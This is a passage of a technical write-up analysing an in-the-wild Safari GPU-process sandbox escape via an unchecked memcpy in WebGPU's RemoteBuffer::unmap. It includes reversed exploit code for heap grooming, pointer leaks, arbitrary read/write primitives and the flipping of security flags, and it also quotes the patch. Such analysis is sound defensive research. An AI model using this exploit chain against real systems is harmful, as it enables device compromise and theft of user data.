
libsystem_kernel.dylib`mach_msg2_trap

IOKit`io_connect_method

IOKit`IOConnectCallMethod

IOGPU`IOGPUResourceCreate

IOGPU`-[IOGPUMetalResource initWithDevice:

          remoteStorageResource:

          options:

          args:

          argsSize:]

IOGPU`-[IOGPUMetalBuffer initWithDevice:

          pointer:

          length:

          alignment:

          options:

          sysMemSize:

          gpuAddress:

          args:

          argsSize:

          deallocator:]

AGXMetalG13X`-[AGXBuffer(Internal) initWithDevice:

                 length:

                 alignment:

                 options:

                 isSuballocDisabled:

                 resourceInArgs:

                 pinnedGPULocation:]

AGXMetalG13X`-[AGXBuffer initWithDevice:

                           length:

                           alignment:

                           options:

                           isSuballocDisabled:

                           pinnedGPULocation:]

AGXMetalG13X`-[AGXG13XFamilyDevice newBufferWithDescriptor:]

IOGPU`IOGPUMetalSuballocatorAllocate

The algorithm which IOMemoryDescriptor::createMappingInTask will use to find space in the task virtual memory is identical to that used by vm_allocate, which starts to explain why the "heap groom" seen earlier is so simple, as vm_allocate uses a simple bottom-up first fit algorithm.

mapAsync

With the origin of the buffer figured out we can trace the GPU process side of the mapAsync IPC. Through various layers of indirection we eventually reach the following code with controlled offset and size values:

void* Buffer::getMappedRange(size_t offset, size_t size)

{

    // https://gpuweb.github.io/gpuweb/#dom-gpubuffer-getmappedrange

    auto rangeSize = size;

    if (size == WGPU_WHOLE_MAP_SIZE)

        rangeSize = computeRangeSize(m_size, offset);

    if (!validateGetMappedRange(offset, rangeSize)) {

        // FIXME: "throw an OperationError and stop."

        return nullptr;

    }

    m_mappedRanges.add({ offset, offset + rangeSize });

    m_mappedRanges.compact();

    return static_cast<char*>(m_buffer.contents) + offset;

}

m_buffer.contents is the base of the buffer which the GPU kernel driver mapped into the GPU process address space via AGXAccelerator::createBufferMemoryDescriptorInTaskWithOptions. This code stores the requested mapping range in m_mappedRanges then returns a raw pointer into the underlying page. Higher up the callstack that raw pointer and length are stored into the m_mappedRange field. The higher level code then makes a copy of the contents of the buffer at that offset, wrapping that copy in a Vector<> to send back over IPC.

unmap

Here's the implementation of the RemoteBuffer_Unmap IPC on the GPU process side. At this point data is a Vector<> sent by the WebContent client.

void RemoteBuffer::unmap(Vector<uint8_t>&& data)

{

    if (!m_mappedRange)

        return;

    ASSERT(m_isMapped);

    if (m_mapModeFlags.contains(PAL::WebGPU::MapMode::Write))

        memcpy(m_mappedRange->source, data.data(), data.size());

    m_isMapped = false;

    m_mappedRange = std::nullopt;

    m_mapModeFlags = { };

}

The issue is a sadly trivial one: whilst the RemoteBuffer code does check that the client has previously mapped this buffer object - and thus m_mappedRange contains the offset and size of that mapped range - it fails to verify that the size of the Vector<> of "modified contents" actually matches the size of the previously mapped range. Instead the code simply blindly memcpy's the client-supplied Vector<> into the mapped range using the Vector<>'s size rather than the range's.

This unchecked memcpy using values directly from an IPC is the in-the-wild sandbox escape vulnerability.

Here's the fix:

  void RemoteBuffer::unmap(Vector<uint8_t>&& data)

  {

-   if (!m_mappedRange)

+   if (!m_mappedRange || m_mappedRange->byteLength < data.size())

      return;

    ASSERT(m_isMapped);

It should be noted that security issues with WebGPU are well-known and the javascript interface to WebGPU is disabled in Safari on iOS. But the IPC's which support that javascript interface were not disabled, meaning that WebGPU still presented a rich sandbox-escape attack surface. This seems like a significant oversight.

Destination unknown?

Finding the allocation site for the GPU buffer wasn't trivial, and it was similarly hard to get a picture of which objects were being groomed: figuring out the overflow target and its allocation site was just as tricky.

Statically following the implementation of the RemoteRenderingBackend::CreateImageBuffer IPC - which, based on the high-level flow of the exploit, appeared to be responsible for allocating the overflow target - again quickly ended up in system library code with no obvious candidates.

Working on the theory that, given the simplicity of the heap groom, vm_allocate/mmap was likely responsible for the allocations, I set breakpoints on those APIs in the Safari GPU process on an M1 Mac and ran the WebGL conformance tests. There was only a single place where mmap was called:

Target 0: (com.apple.WebKit.GPU) stopped.

(lldb) bt

* thread #30, name = 'RemoteRenderingBackend work queue',

  stop reason = breakpoint 12.1

* frame #0: mmap

  frame #1: QuartzCore`CA::CG::Queue::allocate_slab

  frame #2: QuartzCore`CA::CG::Queue::alloc

  frame #3: QuartzCore`CA::CG::ContextDelegate::fill_rects

  frame #4: QuartzCore`CA::CG::ContextDelegate::draw_rects_

  frame #5: CoreGraphics`CGContextFillRects

  frame #6: CoreGraphics`CGContextFillRect

  frame #7: CoreGraphics`CGContextClearRect

  frame #8: WebKit::ImageBufferShareableMappedIOSurfaceBackend::create

  frame #9: WebKit::RemoteRenderingBackend::createImageBuffer

This corresponds perfectly with the IPC we see called in the heap groom above!

To the core...

QuartzCore is part of the low-level drawing/rendering code on iOS. Reversing the code around the mmap site it seems to be a custom queue type used for drawing commands. Dumping the mmap'ed QueueSlab memory a little later on we see some structure:

(lldb) x/10xg $x0

0x13574c000: 0x00000001420041d0 0x0000000000000000

0x13574c010: 0x0000000000004000 0x0000000000003f10

0x13574c020: 0x000000013574c0f0 0x0000000000000000

Reversing some of the surrounding QuartzCore code we can figure out that the header has a structure something like this:

struct QuartzQueueSlab

{

  struct QuartzQueueSlab *free_list_ptr;

  uint64_t size_a;

  uint64_t mmap_size;

  uint64_t remaining_size;

  uint64_t buffer_ptr;

  uint64_t f;

  uint8_t inline_buffer[16336];

};

It's a short header with a free-list pointer, some sizes then a pointer into an inline buffer. The fields are initialized like this:

mapped_base->free_list_ptr = 0;

mapped_base->size_a = 0;

mapped_base->mmap_size = mmap_size;

mapped_base->remaining_size = mmap_size - 0x30;

mapped_base->buffer_ptr = mapped_base->inline_buffer;

Diagram showing the state of a fresh QueueSlab, with the end pointer pointing to the start of the inline buffer.

The QueueSlab is a simple allocator: end starts off pointing to the start of the inline buffer and gets bumped up on each allocation, as long as remaining indicates there's still space available:

Diagram showing the end pointer moving forwards within the allocated slab buffer

Assuming that this is indeed the corruption target, the bytes with which the call to RemoteBuffer::Unmap would corrupt this header line up like this:

Diagram showing the QueueSlab fields corrupted by the primitive and have the arg value replaces the end inline buffer pointer

b[0] = 0x7F6F3229LL;

b[1] = 0LL;

b[2] = 0LL;

b[3] = 0xFFFFLL;

b[4] = arg;

return IPC_RemoteBuffer_Unmap(dst, b, 40LL);

The exploit's wrapper around the RemoteBuffer::Unmap IPC takes a single argument, which lines up perfectly with the inline-buffer pointer of the QueueSlab, replacing it with an arbitrary value.

The queue slab is pointed to by a higher-level CA::CG::Queue object, which in turn is pointed to by a CGContext object.

Groom 2

Before triggering the Unmap overflow there's another groom:

remote_device_after_base_id = rand();

for (j = 0; j < 200; j++) {

  IPC_RemoteDevice_CreateBuffer_16k(

    remote_device_after_base_id + j);

}

semaphore_signal(semaphore_b);

semaphore_signal(semaphore_a);

IPC_RemoteRenderingBackend_CacheNativeImage(

  image_buffer_base_id + 34LL);

semaphore_signal(semaphore_b);

semaphore_signal(semaphore_a);

for (k = 0; k < 200; k++) {

  IPC_RemoteDevice_CreateBuffer_16k(

    remote_device_after_base_id + 200 + k);

}

This is clearly trying to place an allocation related to RemoteRenderingBackend::CacheNativeImage near a large number of allocations related to RemoteDevice::CreateBuffer which is the IPC we saw earlier which causes the allocation of RemoteBuffer objects. The purpose of this groom will become clear later.

Overflow 1

The core primitive for the first overflow involves 4 IPC methods:

  1. RemoteBuffer::MapAsync - sets up the destination pointer for the overflow
  2. RemoteBuffer::Unmap - performs the overflow, corrupting queue metadata
  3. RemoteDisplayListRecorder::DrawNativeImage - uses the corrupted queue metadata to write a pointer to a controlled address
  4. RemoteCDMFactoryProxy::CreateCDM - discloses the written pointer pointer value

We'll look at each of those in turn:

IPC 1 - MapAsync

for (m = 0; m < 6; m++) {

  index_of_corruptor = m;

  IPC_RemoteBuffer_MapAsync(remote_device_buffer_id_base + m,

                            0x4000LL,

                            0LL);

Diagram showing the relationship between RemoteBuffer objects, their backing buffers and the QueueSlab pages. The backing buffers and QueueSlab pages alternate

They iterate through all 6 of the RemoteBuffer objects in the hope that the groom successfully placed at least one of them directly before a QueueSlab allocation. This MapAsync IPC sets the RemoteBuffer's m_mappedRange->source field to point at the very end (hopefully at a QueueSlab.)

IPC 2 - Unmap

wrap_remote_buffer_unmap(
    remote_device_buffer_id_base + m,
    WTF::ObjectIdentifierBase::generateIdentifierInternal_void_::current - 0x88);

wrap_remote_buffer_unmap is the wrapper function we've seen snippets of before which calls the Unmap IPC:

void* wrap_remote_buffer_unmap(int64 dst, int64 arg)

{

  int64 b[5];

  b[0] = 0x7F6F3229LL;

  b[1] = 0LL;

  b[2] = 0LL;

  b[3] = 0xFFFFLL;

  b[4] = arg;

  return IPC_RemoteBuffer_Unmap(dst, b, 40LL);

}

The arg value passed to wrap_remote_buffer_unmap (which is the base target address for the overwrite in the next step) is (WTF::ObjectIdentifierBase::generateIdentifierInternal_void_::current - 0x88), a symbol which was linked by the JS find-and-replace on the Mach-O; it points to the global variable used here:

int64 WTF::ObjectIdentifierBase::generateIdentifierInternal()

{

  return ++WTF::ObjectIdentifierBase::generateIdentifierInternal(void)::current;

}

As the name suggests, this is used to generate unique ids using a monotonically-increasing counter (there is a level of locking above this function.) The value passed in the Unmap IPC points 0x88 below the address of ::current.

Diagram showing the corruption primitive being used to move the end pointer out of the allocated buffer to 0x88 bytes below the target

If the groom works, this has the effect of corrupting a QueueSlab's inline buffer pointer with a pointer to 0x88 bytes below the counter used by the GPU process to allocate new identifiers.

IPC 3 - DrawNativeImage

for ( n = 0; n < 0x22; ++n )  {

  if (n == 2 || n == 4 || n == 6 || n == 8 || n == 10 || n == 12) {

    continue;

  }

  IPC_RemoteDisplayListRecorder_DrawNativeImage(

    image_buffer_base_id + n,   // potentially corrupted target

    image_buffer_base_id + 34LL);

The exploit then iterates through all the ImageBuffer objects (skipping those which were released to make gaps for the RemoteBuffers) and passes each in turn as the first argument to IPC_RemoteDisplayListRecorder_DrawNativeImage. The hope is that one of them had its associated QueueSlab structure corrupted. The second argument passed to DrawNativeImage is the ImageBuffer which had CacheNativeImage called on it earlier.

Let's follow the implementation of DrawNativeImage on the GPU process side to see what happens with the corrupted QueueSlab associated with that first ImageBuffer:

void RemoteDisplayListRecorder::drawNativeImage(

  RenderingResourceIdentifier imageIdentifier,

  const FloatSize& imageSize,

  const FloatRect& destRect,

  const FloatRect& srcRect,

  const ImagePaintingOptions& options)

{

  drawNativeImageWithQualifiedIdentifier(

    {imageIdentifier, m_webProcessIdentifier},

    imageSize,

    destRect,

    srcRect,

    options);

}

This immediately calls through to:

void

RemoteDisplayListRecorder::drawNativeImageWithQualifiedIdentifier(

  QualifiedRenderingResourceIdentifier imageIdentifier,

  const FloatSize& imageSize,

  const FloatRect& destRect,

  const FloatRect& srcRect,

  const ImagePaintingOptions& options)

{

  RefPtr image = resourceCache().cachedNativeImage(imageIdentifier);

  if (!image) {

    ASSERT_NOT_REACHED();

    return;

  }

  handleItem(DisplayList::DrawNativeImage(

               imageIdentifier.object(),

               imageSize,

               destRect,

               srcRect,

               options),

             *image);

}

imageIdentifier here corresponds to the ID of the ImageBuffer which was passed to CacheNativeImage earlier. Looking briefly at the implementation of CacheNativeImage we can see that it allocates a NativeImage object (which is what ends up being returned by the call to cachedNativeImage above):

void

RemoteRenderingBackend::cacheNativeImage(

  const ShareableBitmap::Handle& handle,

  RenderingResourceIdentifier nativeImageResourceIdentifier)

{

  cacheNativeImageWithQualifiedIdentifier(

    handle,

    {nativeImageResourceIdentifier,

      m_gpuConnectionToWebProcess->webProcessIdentifier()}

  );

}

void

RemoteRenderingBackend::cacheNativeImageWithQualifiedIdentifier(

  const ShareableBitmap::Handle& handle,

  QualifiedRenderingResourceIdentifier nativeImageResourceIdentifier)

{

  auto bitmap = ShareableBitmap::create(handle);

  if (!bitmap)

    return;

  auto image = NativeImage::create(

                 bitmap->createPlatformImage(

                   DontCopyBackingStore,

                   ShouldInterpolate::Yes),

                 nativeImageResourceIdentifier.object());

  if (!image)

    return;

  m_remoteResourceCache.cacheNativeImage(

    image.releaseNonNull(),

    nativeImageResourceIdentifier);

}

This NativeImage object is allocated by the default system malloc.

Returning to the DrawNativeImage flow we reach this:

void DrawNativeImage::apply(GraphicsContext& context, NativeImage& image) const

{

    context.drawNativeImage(image, m_imageSize, m_destinationRect, m_srcRect, m_options);

}

The context object is a GraphicsContextCG, a wrapper around a system CoreGraphics CGContext object:

void GraphicsContextCG::drawNativeImage(NativeImage& nativeImage, const FloatSize& imageSize, const FloatRect& destRect, const FloatRect& srcRect, const ImagePaintingOptions& options)

This ends up calling:

CGContextDrawImage(context, adjustedDestRect, subImage.get());

Which calls CGContextDrawImageWithOptions.

Through a few more levels of indirection in the CoreGraphics library this eventually reaches:

int64 CA::CG::ContextDelegate::draw_image_(

  int64 delegate,

  int64 a2,

  int64 a3,

  CGImage *image...) {

...

  alloc_from_slab = CA::CG::Queue::alloc(queue, 160);

  if (alloc_from_slab)

   CA::CG::DrawImage::DrawImage(

     alloc_from_slab,

     Info_2,

     a2,

     a3,

     FillColor_2,

     &v18,

     AlternateImage_0);

Via the delegate object the code retrieves the CGContext and from there the Queue with the corrupted QueueSlab. They then make a 160 byte allocation from the corrupted queue slab.

void*

CA::CG::Queue::alloc(CA::CG::Queue *q, __int64 size)

{

  uint64_t* buffer;

...

  size_rounded = (size + 31) & 0xFFFFFFFFFFFFFFF0LL;

  current_slab = q->current_slab;

  if ( !current_slab )

    goto alloc_slab;

  if ( !q->c || current_slab->remaining_size >= size_rounded )

    goto GOT_ENOUGH_SPACE;

...

GOT_ENOUGH_SPACE:

    remaining_size = current_slab->remaining_size;

    new_remaining = remaining_size - size_requested_rounded;

    if ( remaining_size >= size_requested_rounded )

    {

      buffer = current_slab->end;

      current_slab->remaining_size = new_remaining;

      current_slab->end = buffer + size_rounded;

      goto RETURN_ALLOC;

...

RETURN_ALLOC:

  buffer[0] = size_rounded;

  atomic_fetch_add(q->alloc_meta);

  buffer[1] = q->alloc_meta

...

  return &buffer[2];

}

When CA::CG::Queue::alloc attempts to allocate from the corrupted QueueSlab, it sees that the slab claims to have 0xffff bytes of free space remaining so proceeds to write a 0x10 byte header into the buffer by following the end pointer, then returns that end pointer plus 0x10. This has the effect of returning a value which points 0x78 bytes below the WTF::ObjectIdentifierBase::generateIdentifierInternal(void)::current global.

draw_image_ then passes this allocation as the first argument to CA::CG::DrawImage::DrawImage (with the cachedImage pointer as the final argument.)

int64 CA::CG::DrawImage::DrawImage(

  int64 slab_buf,

  int64 a2,

  int64 a3,

  int64 a4,

  int64 a5,

  OWORD *a6,

  CGImage *img)

{

...

*(int64 *)(slab_buf + 0x78) = CGImageRetain(img);

DrawImage writes the pointer to the cachedImage object to +0x78 in the fake slab allocation, which now exactly overlaps WTF::ObjectIdentifierBase::generateIdentifierInternal(void)::current. This has the effect of replacing the current value of the ::current monotonic counter with the address of the cached NativeImage object.
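Putting the values from the previous steps together shows how precisely the corrupted end pointer was chosen:

// Offset arithmetic, using the values from the steps above:
//   corrupted slab end   = &::current - 0x88  (written by the Unmap overflow)
//   Queue::alloc returns   end + 0x10         (after the 0x10-byte header)
//                        = &::current - 0x78
//   DrawImage then stores  CGImageRetain(img) at alloc + 0x78
//                        = &::current         (counter now holds the pointer)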

IPC 4 - CreateCDM

The final step in this section is to then call any IPC which causes the GPU process to allocate a new identifier using generateIdentifierInternal:

interesting_identifier = IPC_RemoteCDMFactoryProxy_CreateCDM();

If the new identifier is greater than 0x10000 they mask off the lower 4 bits and have successfully disclosed the remote address of the cached NativeImage object.
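Since generateIdentifierInternal pre-increments the counter, the identifier which comes back is effectively the NativeImage address plus one; a sketch of the recovery just described:

#include <cstdint>

// Recover the leaked NativeImage address from the newly allocated ID.
uint64_t leak_native_image_address() {
  uint64_t id = IPC_RemoteCDMFactoryProxy_CreateCDM();
  if (id <= 0x10000)
    return 0;           // groom failed; the counter wasn't replaced
  return id & ~0xfULL;  // mask the low bits back off the malloc pointer
}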

Over and over - arbitrary read

The next stage is to build an arbitrary read primitive, this time using 5 IPCs:

  1. MapAsync - sets up the destination pointer for the overflow
  2. Unmap - performs the overflow, corrupting queue metadata
  3. SetCTM - sets up parameters
  4. FillRect - writes the parameters through a controlled pointer
  5. CreateRecorder - returns data read from an arbitrary address

Arbitrary read IPC 1 & 2: MapAsync/Unmap

MapAsync and Unmap are used to again corrupt the same QueueSlab object, but this time the queue slab buffer pointer is corrupted to point 0x18 bytes below the following symbol:

WebCore::MediaRecorderPrivateWriter::mimeType(void)const::$_11::operator() const(void)::impl

Specifically, that symbol is the constant StringImpl object for the "audio/mp4" string returned by reference from this function:

const String&

MediaRecorderPrivateWriter::mimeType() const {

  static NeverDestroyed<const String>

    audioMP4(MAKE_STATIC_STRING_IMPL("audio/mp4"));

  static NeverDestroyed<const String>

    videoMP4(MAKE_STATIC_STRING_IMPL("video/mp4"));

  return m_hasVideo ? videoMP4 : audioMP4;

}

Concretely this is a StringImplShape object with this layout:

class STRING_IMPL_ALIGNMENT StringImplShape {

    unsigned m_refCount;

    unsigned m_length;

    union {

        const LChar* m_data8;

        const UChar* m_data16;

        const char* m_data8Char;

        const char16_t* m_data16Char;

    };

    mutable unsigned m_hashAndFlags;

};

Arbitrary read IPC 3: SetCTM

The next IPC is RemoteDisplayListRecorder::SetCTM:

messages -> RemoteDisplayListRecorder NotRefCounted Stream {

...

    SetCTM(WebCore::AffineTransform ctm) StreamBatched

...

CTM is the "Current Transform Matrix" and the WebCore::AffineTransform object passed as the argument is a simple struct with 6 double values defining an affine transformation.

The exploit IPC wrapper function takes two arguments in addition to the image buffer id, and from the surrounding context it's clear that they must be a length and pointer for the arbitrary read:

IPC_RemoteDisplayListRecorder_SetCTM(

  candidate_corrupted_target_image_buffer_id,

  (read_this_much << 32) | 0x100,

  read_from_here);
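Since the IPC arguments are doubles, the wrapper presumably just reinterprets the two 64-bit integers as the raw bit patterns of the first two matrix entries - a sketch:

#include <bit>
#include <cstdint>
#include <utility>

// Build the two "double" matrix entries from the 64-bit read parameters;
// std::bit_cast (C++20) preserves the raw bit patterns across the cast.
std::pair<double, double> pack_ctm_params(uint64_t read_this_much,
                                          uint64_t read_from_here) {
  return { std::bit_cast<double>((read_this_much << 32) | 0x100),
           std::bit_cast<double>(read_from_here) };
}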

The wrapper passes those two 64-bit values as the first two "doubles" in the IPC. On the receiver side the implementation doesn't do much apart from directly store those affine transform parameters into the CGContext's CGState object:

void

setCTM(const WebCore::AffineTransform& transform) final

{

  GraphicsContextCG::setCTM(

    m_inverseImmutableBaseTransform * transform);

}

void

GraphicsContextCG::setCTM(const AffineTransform& transform)

{

  CGContextSetCTM(platformContext(), transform);

  m_data->setCTM(transform);

  m_data->m_userToDeviceTransformKnownToBeIdentity = false;

}

Reversing CGContextSetCTM we see that the transform is just stored into a 0x30 byte field at offset +0x18 in the CGContext's CGGState object (at +0x60 in the CGContext):

188B55CD4  EXPORT _CGContextSetCTM                      

188B55CD4  MOV   X8, X0

188B55CD8  CBZ   X0, loc_188B55D0C

188B55CDC  LDR   W9, [X8,#0x10]

188B55CE0  MOV   W10, #'CTXT'

188B55CE8  CMP   W9, W10

188B55CEC  B.NE  loc_188B55D0C

188B55CF0  LDR   X8, [X8,#0x60]

188B55CF4  LDP   Q0, Q1, [X1]

188B55CF8  LDR   Q2, [X1,#0x20]

188B55CFC  STUR  Q2, [X8,#0x38]

188B55D00  STUR  Q1, [X8,#0x28]

188B55D04  STUR  Q0, [X8,#0x18]

188B55D08  RET

Arbitrary read IPC 4: FillRect

This IPC takes a similar path to the DrawNativeImage IPC discussed earlier. It allocates a new buffer from the corrupted QueueSlab, with the value returned by CA::CG::Queue::alloc this time pointing 8 bytes below the "audio/mp4" StringImpl. FillRect eventually reaches this code:

CA::CG::DrawOp::DrawOp(slab_ptr, a1, a3, CGGState, a5, v24);

...

  CTM_2 = (_OWORD *)CGGStateGetCTM_2(CGGGState);

  v13 = CTM_2[1];

  v12 = CTM_2[2];

  *(_OWORD *)(slab_ptr + 8) = *CTM_2;

  *(_OWORD *)(slab_ptr + 0x18) = v13;

  *(_OWORD *)(slab_ptr + 0x28) = v12;

…which just directly copies the 6 CTM doubles to offset +8 in the allocation returned by the corrupted QueueSlab, which overlaps completely with the StringImpl, corrupting the string length and buffer pointer.
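Lining the copied values up against the StringImplShape layout shows exactly what gets overwritten:

// How the copied CTM values overlap the "audio/mp4" StringImpl
// (the corrupted alloc points 8 bytes below it; the copy starts at +8):
//   CTM[0] -> { m_refCount = 0x100, m_length = read_this_much }
//   CTM[1] -> m_data8       = read_from_here
//   CTM[2] -> m_hashAndFlags (plus padding)
// The StringImpl now describes an attacker-chosen buffer and length.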

Arbitrary read IPC 5: CreateRecorder

messages -> RemoteMediaRecorderManager NotRefCounted {

  CreateRecorder(

    WebKit::MediaRecorderIdentifier id,

    bool hasAudio,

    bool hasVideo,

    struct WebCore::MediaRecorderPrivateOptions options)

      ->

    ( std::optional<WebCore::ExceptionData> creationError,

      String mimeType,

      unsigned audioBitRate,

      unsigned videoBitRate)

  ReleaseRecorder(WebKit::MediaRecorderIdentifier id)

}

The CreateRecorder IPC returns, among other things, the contents of the mimeType String which FillRect corrupted to point to an arbitrary location, yielding the arbitrary read primitive.

What to read?

Recall that the cacheNativeImage operation was sandwiched between the allocation of 400 RemoteBuffer objects via the RemoteDevice::CreateBuffer IPC.

Note that earlier (for the MapAsync/Unmap corruption) it was the backing buffer pages of the RemoteBuffer which were the groom target - that's not the case for the memory disclosure. The target is instead the AGXG15FamilyBuffer object, the wrapper object which points to those backing pages. These are also allocated during the RemoteDevice::CreateBuffer IPC calls. Crucially, these wrapper objects are allocated by the default malloc implementation, which is malloc_zone_malloc using the default ("scalable") zone. @elvanderb covered the operation of this heap allocator in their "Heapple Pie" presentation. Provided that the targeted allocation size's freelist is empty, this zone will allocate upwards, making it likely that the NativeImage and AGXG15FamilyBuffer objects will be near each other in virtual memory.

They use the arbitrary read primitive to read 3 pages of data from the GPU process, starting from the address of the cached NativeImage, and search for an Objective-C isa pointer matching the AGXG15FamilyBuffer class (masking out any PAC bits):

for ( ii = 0; ii < 0x1800; ++ii ) {

  if ( ((leaker_buffer_contents[ii] >> 8) & 0xFFFFFFFF0LL) ==

    (AGXMetalG15::_OBJC_CLASS___AGXG15FamilyBuffer & 0xFFFFFFFF0LL) )

...

What to write?

If the search is successful they now know the absolute address of one of the AGXG15FamilyBuffer objects - but at this point they don't know which of the RemoteBuffer objects it corresponds to.

They use the same Map/Unmap/SetCTM/FillRect IPCs as in the setup for the arbitrary read to write the address of WTF::ObjectIdentifierBase::generateIdentifierInternal_void_::current (the monotonic unique id counter seen earlier) into the field at +0x98 of the AGXG15FamilyBuffer.

Looking at the class hierarchy of AGXG15FamilyBuffer (AGXG15FamilyBuffer : AGXBuffer : IOGPUMetalBuffer : IOGPUMetalResource : _MTLResource : _MTLObjectWithLabel : NSObject) we find that +0x98 is the virtualAddress property of IOGPUMetalResource.

@interface IOGPUMetalResource : _MTLResource <MTLResourceSPI> {

        IOGPUMetalResource* _res;

        IOGPUMetalResource* next;

        IOGPUMetalResource* prev;

        unsigned long long uniqueId;

}

@property (readonly) _IOGPUResource* resourceRef;

@property (nonatomic,readonly) void* virtualAddress;

@property (nonatomic,readonly) unsigned long long gpuAddress;

@property (nonatomic,readonly) unsigned resourceID;

@property (nonatomic,readonly) unsigned long long resourceSize;

@property (readonly) unsigned long long cpuCacheMode;

I mentioned earlier that the destination pointer for the MapAsync/Unmap bad memcpy was calculated from a buffer property called contents, not virtualAddress:

  return static_cast<char*>(m_buffer.contents) + offset;

Dot syntax in Objective-C is syntactic sugar around calling an accessor method, and the contents accessor directly calls the virtualAddress accessor, which returns the virtualAddress field:

void* -[IOGPUMetalBuffer contents]

  B               _objc_msgSend$virtualAddress_1

-[IOGPUMetalResource virtualAddress]

ADRP   X8, #_OBJC_IVAR_$_IOGPUMetalResource._res@PAGE

LDRSW  X8, [X8,#_OBJC_IVAR_$_IOGPUMetalResource._res@PAGEOFF] ; 0x18

ADD    X8, X0, X8

LDR    X0, [X8,#0x80]

RET

They then loop through each of the candidate RemoteBuffer objects, mapping the beginning then unmapping with an 8 byte buffer, causing a write of a sentinel value through the potentially corrupted IOGPUMetalResource::virtualAddress field:

for ( jj = 200; jj < 400; ++jj )

{

  sentinel = 0x3A30DD9DLL;

  IPC_RemoteBuffer_MapAsync(remote_device_after_base_id + jj, 0LL, 0LL);

  IPC_RemoteBuffer_Unmap(remote_device_after_base_id + jj, &sentinel, 8LL);

  semaphore_signal(semaphore_a);

  CDM = IPC_RemoteCDMFactoryProxy_CreateCDM();

  if ( CDM >= 0x3A30DD9E && CDM <= 0x3A30DF65 ) {

    ...

After each write they request a new CDM and look to see whether they got a resource ID near the sentinel value they set - if so then they've found a RemoteBuffer whose virtual address they can completely control!

They store this id and use it to build their final arbitrary write primitive with 6 IPCs:

arbitrary_write(u64 ptr, u64 value_ptr, u64 size) {

  IPC_RemoteBuffer_MapAsync(

   remote_device_buffer_id_base + index_of_corruptor,

   0x4000LL, 0LL);

  wrap_remote_buffer_unmap(

    remote_device_buffer_id_base + index_of_corruptor,

    agxg15familybuffer_plus_0x80);

  IPC_RemoteDisplayListRecorder_SetCTM(

    candidate_corrupted_target_image_buffer_id,

    ptr,

    0LL);

  IPC_RemoteDisplayListRecorder_FillRect(

    candidate_corrupted_target_image_buffer_id);

  IPC_RemoteBuffer_MapAsync(

    device_id_with_corrupted_backing_buffer_ptr, 0LL, 0LL);

  IPC_RemoteBuffer_Unmap(

    device_id_with_corrupted_backing_buffer_ptr, value_ptr, size);

}

The first MapAsync/Unmap pair corrupts the original QueueSlab, pointing its buffer pointer 0x18 bytes below the address of the virtualAddress field of an AGXG15FamilyBuffer.

SetCTM and FillRect then cause the arbitrary write target pointer value to be written through the corrupted QueueSlab allocation to replace the AGXG15FamilyBuffer's virtualAddress member.

The final MapAsync/Unmap pair then write through that corrupted virtualAddress field, yielding an arbitrary write primitive which won't corrupt any surrounding memory.

Mitigating mitigations

At this point the attackers have an arbitrary read/write primitive - it's surely game over. But nevertheless, the most fascinating parts of this exploit are still to come.

Remember, they are not just seeking to exploit this one vulnerability; they are seeking to build as many full exploit chains as possible at the lowest marginal cost. This is typically done using custom frameworks which permit code-reuse across exploits. In this case the goal is to use some resources (IOKit userclients) which only the GPU Process has access to, and this is done in a very generic way using a custom framework which requires only a few arbitrary writes to kick off.


What's old is new again - NSArchiver

The FORCEDENTRY sandbox escape exploit which I wrote about last year used a logic flaw to enable the evaluation of an NSExpression across a sandbox boundary. If you're unfamiliar with NSExpression exploitation I'd recommend reading that post first.

As part of the fix for that issue Apple introduced various hardening measures intended to restrict both the computational power of NSExpressions as well as the particular avenue used to cause the evaluation of an NSExpression during object deserialization.

The functionality was never actually removed though. Instead, it was deprecated and gated behind various flags. This likely did lock down the attack surface from certain perspectives; but with a sufficiently powerful initial primitive (like an arbitrary read/write) those flags can simply be flipped and the full power of NSExpression-based scripting can be regained. And that's exactly what this exploit continues on to do...

Flipping bits

Using the arbitrary read/write they flip the globals used in places like __NSCoderEnforceFirstPartySecurityRules to disable various security checks.

They also swap around the implementation class of NSSharedKeySet to be PrototypeTools::_OBJC_CLASS___PTModule and swap the NSKeyPathSpecifierExpression and NSFunctionExpression classRefs to point to each other.

Forcing Entry

We've seen throughout this writeup that Safari has its own IPC mechanism with custom serialization - it's not using XPC or MIG or protobuf or Mojo or any of the dozens of other serialization options. But is it the case that everything gets serialized with their custom code?

As we observed in the ForcedEntry writeup, it's often just one tiny, innocuous line of code which ends up opening up an enormous extra attack surface. In ForcedEntry it was a seemingly simple attempt to edit the loop count of a GIF. Here, there's another simple piece of code which opens up a potentially unexpected, huge extra attack surface: NSKeyedArchiver. It turns out you can get objects serialized and deserialized with NSKeyedArchiver across a Safari IPC boundary, specifically using this IPC:

  RedirectReceived(

    WebKit::RemoteMediaResourceIdentifier identifier,

    WebCore::ResourceRequest request,

    WebCore::ResourceResponse response)

  ->

    (WebCore::ResourceRequest returnRequest)

In addition to the identifier, this IPC takes two structured arguments:

WebCore::ResourceRequest request

WebCore::ResourceResponse response

Let's look at the ResourceRequest deserialization code:

bool

ArgumentCoder<ResourceRequest>::decode(

  Decoder& decoder,

  ResourceRequest& resourceRequest)

{

  bool hasPlatformData;

  if (!decoder.decode(hasPlatformData))

    return false;

  bool decodeSuccess =

    hasPlatformData ?

      decodePlatformData(decoder, resourceRequest)

    :

      resourceRequest.decodeWithoutPlatformData(decoder);

That in turn calls:

bool

ArgumentCoder<WebCore::ResourceRequest>::decodePlatformData(

  Decoder& decoder,

  WebCore::ResourceRequest& resourceRequest)

{

  bool requestIsPresent;

  if (!decoder.decode(requestIsPresent))

     return false;

  if (!requestIsPresent) {

    resourceRequest = WebCore::ResourceRequest();

    return true;

  }

  auto request = IPC::decode<NSURLRequest>(

                   decoder, NSURLRequest.class);

That last line decoding request looks slightly different to the others - rather than calling decoder.decode() and passing the field to decode by reference they're explicitly typing the field here in the template invocation, which takes a different decoder path:

template<typename T, typename>

std::optional<RetainPtr<T>> decode(

  Decoder& decoder, Class allowedClass)

{

    return decode<T>(decoder, allowedClass ?

                              @[ allowedClass ] : @[ ]);

}

(note that the @[] syntax defines an Objective-C array literal, so this is creating an array with a single entry)

This then calls:

template<typename T, typename>

std::optional<RetainPtr<T>> decode(

  Decoder& decoder, NSArray<Class> *allowedClasses)

{

  auto result = decodeObject(decoder, allowedClasses);

  if (!result)

    return std::nullopt;

  ASSERT(!*result ||

         isObjectClassAllowed((*result).get(), allowedClasses));

  return { *result };

}

This continues on to a different argument decoder implementation than the one we've seen so far:

std::optional<RetainPtr<id>>

decodeObject(

  Decoder& decoder,

  NSArray<Class> *allowedClasses)

{

  bool isNull;

  if (!decoder.decode(isNull))

    return std::nullopt;

  if (isNull)

    return { nullptr };

